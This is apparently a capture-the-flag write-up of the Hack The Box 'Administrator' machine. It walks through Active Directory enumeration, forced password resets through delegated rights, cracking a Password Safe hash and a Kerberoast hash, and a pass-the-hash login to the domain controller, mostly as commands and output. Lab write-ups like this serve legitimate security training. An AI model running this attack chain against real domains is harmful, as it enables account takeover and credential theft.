HTB - Administrator

Description

---

The administrator is a medium machine difficulty with the assume breach methodology, in which you start the machine with a low-privileged user.

Enumeration

---

Nmap Scan

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $nmap -F -Pn $ip -oN Nmap/fast-scan

PORT    STATE SERVICE
21/tcp  open  ftp
53/tcp  open  domain
88/tcp  open  kerberos-sec
135/tcp open  msrpc
139/tcp open  netbios-ssn
389/tcp open  ldap
445/tcp open  microsoft-ds

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn

PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $nmap -p21,53,88,135,139,389,445 -sCV $ip -oN Nmap/script-scan

PORT    STATE SERVICE       VERSION
21/tcp  open  ftp           Microsoft ftpd
53/tcp  open  domain        Simple DNS Plus
88/tcp  open  kerberos-sec  Microsoft Windows Kerberos
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp open  ldap          Active Directory LDAP (Domain: administrator.htb)
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time: 
|   date: 2024-11-10T04:07:40
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 7h00m00s

Summary

* Open ports: 21,53,88,135,139,389,445
* UDP open ports: 53,88,123,389
* Services: FTP - DNS - KERBEROS - RPC - SMB - LDAP
* Important notes: Domain: administrator.htb

hosts file

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼  sudo sh -c "echo  '10.10.11.42 dc administrator.htb DC.administrator.htb' >> /etc/hosts"
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $tail -n1 /etc/hosts
10.10.11.42 dc administrator.htb DC.administrator.htb

Foothold

---

I'm in the habit of searching and using new tools released, So I will start my enumeration process this time with cicada-masterful

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $python3 cicada-mastertul.py -u Olivia -p ichliebedich -d Administrator.htb -t 10.10.11.42 --full


                         ██████╗██╗ ██████╗ █████╗ ██████╗  █████╗
                        ██╔════╝██║██╔════╝██╔══██╗██╔══██╗██╔══██╗
                        ██║     ██║██║     ███████║██║  ██║███████║
                        ██║     ██║██║     ██╔══██║██║  ██║██╔══██║
                        ╚██████╗██║╚██████╗██║  ██║██████╔╝██║  ██║
                         ╚═════╝╚═╝ ╚═════╝╚═╝  ╚═╝╚═════╝ ╚═╝  ╚═╝   
                                |__ by - theblxckcicada __|               

        ███╗   ███╗ █████╗ ███████╗████████╗███████╗██████╗ ████████╗██╗   ██╗██╗
        ████╗ ████║██╔══██╗██╔════╝╚══██╔══╝██╔════╝██╔══██╗╚══██╔══╝██║   ██║██║
        ██╔████╔██║███████║███████╗   ██║   █████╗  ██████╔╝   ██║   ██║   ██║██║
        ██║╚██╔╝██║██╔══██║╚════██║   ██║   ██╔══╝  ██╔══██╗   ██║   ██║   ██║██
        ██║ ╚═╝ ██║██║  ██║███████║   ██║   ███████╗██║  ██║   ██║   ╚██████╔╝███████╗
        ╚═╝     ╚═╝╚═╝  ╚═╝╚══════╝   ╚═╝   ╚══════╝╚═╝  ╚═╝   ╚═╝    ╚═════╝ ╚══════╝ 

..snip..
[!x!] Scanning 10.10.11.42
[!] Enumerating SMB...
[-] Could not connect to SMB 
[!] Connecting to WinRM...
[-] Could not connect to WinRM 
[!] Enumerating Lookupsids using impacket...
[+] Lookupsids saved to /home/kali/HackTheBox/platform/machines/Administrator/mastertul/10.10.11.42/lookupsid_results/lookupsid_file.txt
[+] Users list saved to /home/kali/HackTheBox/platform/machines/Administrator/mastertul/10.10.11.42/lookupsid_results/users.txt
[!] Enumerating NPUsers using impacket...
[-] No NPUsers found
[!] Enumerating UserSPNs using impacket...
[-] No UserSPNs found
[!] Collecting Bloodhound Files...
[+] Bloodhound saved to /home/kali/HackTheBox/platform/machines/Administrator/mastertul/10.10.11.42/bloodhound_results
[!] Enumerating LDAP...
[+] LDAP saved to /home/kali/HackTheBox/platform/machines/Administrator/mastertul/10.10.11.42/ldap_results

After collecting data with bloodhound and ldapdomaindump, I will enumerate the domain for possible Domain Escalation paths.

• Looking at Bloodhound CE, User Olivia has GenericAll on Michael which means he can

  1. Assign fake SPN and perform targeted Kerberoast attack

  2. Reset the password of that user

  3. Perform Shadow Credentials (Need PKINIT authentication)

And Michael Can ForceChangePassword of Benjamin

To perform this attack completely from Linux, I will use the following commands

net rpc password "michael" 'P@ssw00rd!231!!!' -U "administrator.htb"/"Olivia"%'ichliebedich' -S dc.administrator.htb

net rpc password "benjamin" 'P@ssw00rd!555!!!' -U "administrator.htb"/"michael"%'P@ssw00rd!231!!!' -S dc.administrator.htb

Now, I have Benjamin account and he is a member in Share Moderators group

When I looked at the shares for juicy files, I didn't find anything useful

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $cat /tmp/nxc_hosted/nxc_spider_plus/10.10.11.42.json
{
    "NETLOGON": {},
    "SYSVOL": {
        "administrator.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI": {
            "atime_epoch": "2024-10-30 17:22:19",
            "ctime_epoch": "2024-10-04 15:48:32",
            "mtime_epoch": "2024-10-30 17:22:19",
            "size": "23 B"
        },
        "administrator.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
            "atime_epoch": "2024-10-30 17:22:19",
            "ctime_epoch": "2024-10-04 15:48:32",
            "mtime_epoch": "2024-10-30 17:22:19",
            "size": "1.07 KB"
        },
        "administrator.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol": {
            "atime_epoch": "2024-10-04 15:55:13",
            "ctime_epoch": "2024-10-04 15:55:13",
            "mtime_epoch": "2024-10-04 15:55:13",
            "size": "2.74 KB"
        },
        "administrator.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI": {
            "atime_epoch": "2024-10-30 19:56:19",
            "ctime_epoch": "2024-10-04 15:48:32",
            "mtime_epoch": "2024-10-30 19:56:19",
            "size": "22 B"
        },
        "administrator.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
            "atime_epoch": "2024-10-30 17:22:53",
            "ctime_epoch": "2024-10-04 15:48:32",
            "mtime_epoch": "2024-10-30 17:22:53",
            "size": "4.16 KB"
        },
        "administrator.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Registry.pol": {
            "atime_epoch": "2024-10-30 19:56:19",
            "ctime_epoch": "2024-10-30 19:56:19",
            "mtime_epoch": "2024-10-30 19:56:19",
            "size": "184 B"
        },
        "administrator.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/comment.cmtx": {
            "atime_epoch": "2024-10-30 19:56:19",
            "ctime_epoch": "2024-10-30 19:56:19",
            "mtime_epoch": "2024-10-30 19:56:19",
            "size": "553 B"
        }
    }

I will then move toftp with the two new accounts I have using FileZilla. Michael's account doesn't have any files but benjamin does

After downloading the file, it seems to be encrypted by the master password by default.

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $file Backup.psafe3 
Backup.psafe3: Password Safe V3 database

I used this tool to get the password hash of the database

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $pwsafe2john Backup.psafe3 > psafe3.hash

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $cat psafe3.hash 
Backu:$pwsafe$*3*4ff588b74906263ad2abba592aba35d58bcd3a57e307bf79c8479dec6b3149aa*2048*1a941c10167252410ae04b7b43753aaedb4ec63e3f18c646bb084ec4f0944050

Using john the ripper, I cracked this hash successfully

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $john hash --wordlist=/usr/share/wordlists/rockyou.txt 

..snip..
tekieromucho     (Backu)

Then, I downloaded this program to my Windows machine to open it and exported all the passwords to .txt file

Password Safe

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $evil-winrm -i dc -u emily -p UXLCI5iETUsIBoFVxxxxxxxxxx

*Evil-WinRM* PS C:\Users\emily\Desktop> type user.txt
78a12ed55133ef7aa5b8xxxxxxxxxx

Privilege Escalation

---

• User Emily has GenericWrite on Ethan, So she can do the following

  1. Targeted Kerberoast attack

  2. Shadow Credentials

User Ethan has DCSync rights, So I can dump ntds database with this account

Abuse GenericWrite privileges

/opt/targetedKerberoast/targetedKerberoast.py -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8xxxxxxxxx'

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $hashcat -m 13100 ethan.hash /usr/share/wordlists/rockyou.txt 

..snip..
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$8e4f007c95ee9cefd15d2a413649e2cb$40f39f9952bfdef0b926a0a702c54924d6505dc92b467ae42b30572c98def4190f09c89f0a7fa6bb938815e664cfb3df19bb51de25d6b5581dc50eb87263f6504a9de1e472ee6d505d59fc587ca2982cc327448cf40c89404a274d31aaea9e86483c0d949bbd05574eec1a1afbdc1515b7a180b481e5643ddc6167f40416e7a81a424483f4cbb99669d02bd45e7ed86c45e4d0d6588e9db0e71d0ab507ad1e9acb6e40ff0b47a73cdcb1bd9c2c8a250d37dee24e7ecee30a91785222d9aff7cbe78b4cba252a5433c03f391ab6768359f72c82d21c597c39549fd95ec0f5e2036bf1059f1966a55d32e54bfb81c9287e2bdea348c1e0012c2bda56adcbd865bc50fc2df12786952e9699657b2ceb286900e891ce5f6d8ad22f20ea6584370647bf8ca0df03787bf26c28ffc3941534ad4a5bb5edd6e20e47d0db614e0b0930575c520128ff62fe456f444ae2c2559b9eac93d4016f9bc7d219263c12049819bb43032102c5ce43cfc667d0c41d9695af63b0b668601cc8168c1ecd8093b8949681cdf772e8f6f3327184f89b5a27421a665a7277ddeb6b05b07f45fff7268de22612cf3a08e48eb231878090112175f50e3f2b89000a34fd0d2aa26c463c0f061c24c0b380b754af08ba628f86375b4b80f8699f0d68443427cd413ae54728f5f1e7c99b7e2ae839fc9754f3e22474df7b156a831a3c9cabd8a029d51cc6ee3a4d370b0cd4372f9e3083dd0fc2ae3d60088278fdc4c0e9593976fe8be90b72fe4742058bde801f2ee64584d4fae3cb4892ed448a9d8f83d33e1ef883f8dcac5f9fad147178d3ecdb0e0f58997489884e6e93d625f4e2f4355fd80d42afa05cdd29bdacb7f833f3482d1fb0cd859e20133cd0b44750797ca518b4bf184901631886da8a48af573b1d0877a82b6c97dbaeb88e2cc465a8199f6384261fe975ddc9502816a10417a2b71d6a3acbded0c3313a21c4e350db6ee77aafa2aa954f48ec935d9138c2e44e8052f7b979413eca476b70e3bd7f9e2fba2a20aaa86b5e3e049a2701488771f4f2a0c62d806e974fe61f8c0ae215cca6059a7e46c5c148f3d7865fed6adeab7ed4c17a2e2ab51a6a8a2a149312a6bf8xxxxxxxxxxxxa8657a8eff6f18ef58560546ec8f6983e9e76096e9918fbe8b9b9a3e9a9df996efd8381d40f8a2db07dff53b5469b6f90859605c1f02856e1102613a5e89f8840dff62950d4ff559a019481bab803815cda53bbaf99e51a525c2fbdf7fe8017477de199f1a2bec11227c019fbb47c46ce2c7637f4256ad9e8bad94df8cea56a83c6b18276c2e99739e9a9c98a0a819525f956900e829383fcf20ede5bb4f9c73450264ee083a14b891a09ff6f8b480963b0beca95b21f49a3870e8934874ee0f74d53ad36b6d0ac0939f0b3a8c4579156610cd02b99fd588a16ce977cfbee0578f90aace9cf34936ffb2cae693321bf05a5e256953907bda6bcb51e9149bef5c70712175e1aa024bf41deeacbf7279f719b3051c311e830d8746dedaf23fca8fd6c:xxxxxxxxxx

Session..........: hashcat
Status...........: Cracked

Dump administrator hash

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $evil-winrm -i dc -u administrator -H 3dc553ce4b9fd20bd01xxxxxxxxxxx

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
b42e8a0a9a5c81e4b7f8xxxxxxxxxxxxx

Root Flag: b42e8a0a9a5c81e4b7f8xxxxxxxxxxxxx